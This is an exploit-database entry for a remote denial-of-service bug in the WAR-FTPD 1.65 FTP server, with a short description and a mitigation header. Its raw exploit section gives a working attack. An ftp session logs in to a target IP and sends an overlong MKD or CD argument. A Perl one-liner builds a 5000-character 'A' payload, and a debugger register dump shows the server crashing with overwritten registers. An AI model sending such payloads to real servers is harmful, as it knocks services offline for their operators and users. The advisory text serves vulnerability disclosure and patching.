WAR-FTPD 1.65 (MKD & CD) requests Remote Denial of Service

vendor:

WAR-FTPD

by:

opt!x hacker

7,5

CVSS

HIGH

Remote Denial of Service

400

CWE

Product Name: WAR-FTPD

Affected Version From: 1.65

Affected Version To: 1.65

Patch Exists: YES

Related CWE: N/A

CPE: a:war-ftpd:war-ftpd:1.65

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

WAR-FTPD 1.65 (MKD & CD) requests Remote Denial of Service

A remote denial of service vulnerability exists in WAR-FTPD 1.65 when a malicious user sends a MKD or CD request with a large number of characters. This causes the server to crash and become unresponsive.

Mitigation:

Upgrade to the latest version of WAR-FTPD or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

WAR-FTPD 1.65 (MKD & CD) requests Remote Denial of Service
exploited by opt!x hacker
mail: optix@9.cn
greetz to his0k4
about : http://securityreason.com/exploitalert/6971
you have to connect to target server from cmd like that:
i sended it with perl and python scripts but it's not working because im
beginner in remotes
############################################################
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrateur>ftp
ftp> open
Vers 5.237.109.181 21
ConnectÃ© Ã  5.237.109.181.
220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
Utilisateur (5.237.109.181:(none)) : root
331 User name okay, Need password.
Mot de passe :
230 User logged in, proceed.
ftp> MKD A x 5000 or cd A x 5000
##########################################################

you have to execute this perl script then put his content after MKD or CD
__________________________________________________________________
my $crash= "A" x 5000;
open(c,">>denial.txt");
print c $crash;
print "[+] Done !! [+]";
close(c);
_________________________________________________________________

then olly is executed because im working with this option : just in time
debugger

###########################################################################
#################"""
EAX 41414141
ECX 008EEC18 ASCII
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA
EDX 008E0278
EBX 008E0000
ESP 00B2F538
EBP 00B2F758
ESI 008EEC10 ASCII
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA
EDI 41414141
EIP 7C9211DE ntdll.7C9211DE
###########################################################################
##################"""

and programm will be crashed :) 

# milw0rm.com [2009-08-24]